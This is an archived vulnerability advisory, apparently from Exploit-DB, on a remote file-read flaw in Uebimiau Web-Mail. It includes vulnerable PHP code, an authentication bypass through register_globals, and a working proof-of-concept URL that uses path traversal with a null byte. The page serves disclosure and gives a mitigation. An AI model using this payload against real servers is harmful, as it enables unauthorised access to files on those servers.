Uebimiau Web-Mail Remote File Reader

vendor:

Uebimiau Web-Mail

by:

Eugene Minaev

N/A

CVSS

N/A

Remote File Reader

CWE

Product Name: Uebimiau Web-Mail

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Uebimiau Web-Mail Remote File Reader

The Uebimiau Web-Mail application is vulnerable to a remote file reader exploit. By manipulating the script parameters, an attacker can trick the script into thinking they are an authorized user and gain unauthorized access to sensitive files. This vulnerability can be exploited if the register_globals setting is enabled.

Mitigation:

Disable the register_globals setting in the PHP configuration or upgrade to a newer version of the Uebimiau Web-Mail application that addresses this vulnerability.

Source

Exploit-DB raw data:

----[ Uebimiau Web-Mail Remote File Reader ... ITDefence.ru Antichat.ru ]

							Uebimiau Web-Mail Remote File Reader
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
		 
		
		At first i decided to look login script . Each script includes this code
		
		<?php
		if(strlen($f_pass) > 0) {

		..elseif (
		($sess["auth"] && intval((time()-$start)/60) < $idle_timeout)) {

		$UM->mail_user   = $f_user    = $sess["user"];
		$UM->mail_pass   = $f_pass    = $sess["pass"];
		$UM->mail_server = $f_server  = $sess["server"];
		$UM->mail_email  = $f_email   = $sess["email"];

		} else {
		Header("Location: ./index.php?tid=$tid&lid=$lid\r\n"); 
		exit; 
		} 
		?>
		
		So , if register_globals on , we can make a request like script.php?f_pass=+toxa+&sess[auth]=1 
		to make script think that we are authorized user . Then i looked each script to find something 
		interest.
		
		<?php
		define("SMARTY_DIR","./smarty/");
		require_once(SMARTY_DIR."Smarty.class.php");
		$smarty = new Smarty;
		$smarty->compile_dir = $temporary_directory;
		$smarty->security=true;
		$smarty->secure_dir=array("./");
		$smarty->assign("umLanguageFile",$selected_language.".txt");  
		?>
		
		Looks great  :)  But selected_language was already defined . But there was a similar code with EXTRACT.
		So , we can read local files on server !
		
		<?php
		if($phpver >= 4.1) {
		extract($_GET);
		}

		$smarty->assign("umSid",$sid);
		$smarty->assign("umLid",$lid);
		$smarty->assign("umTid",$tid);

		$smarty->assign("umErrorCode",$err);

		$smarty->display("$selected_theme/error.htm");
		?>
		
		http://test1.ru/uebimiau/error.php?f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00
		
		
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]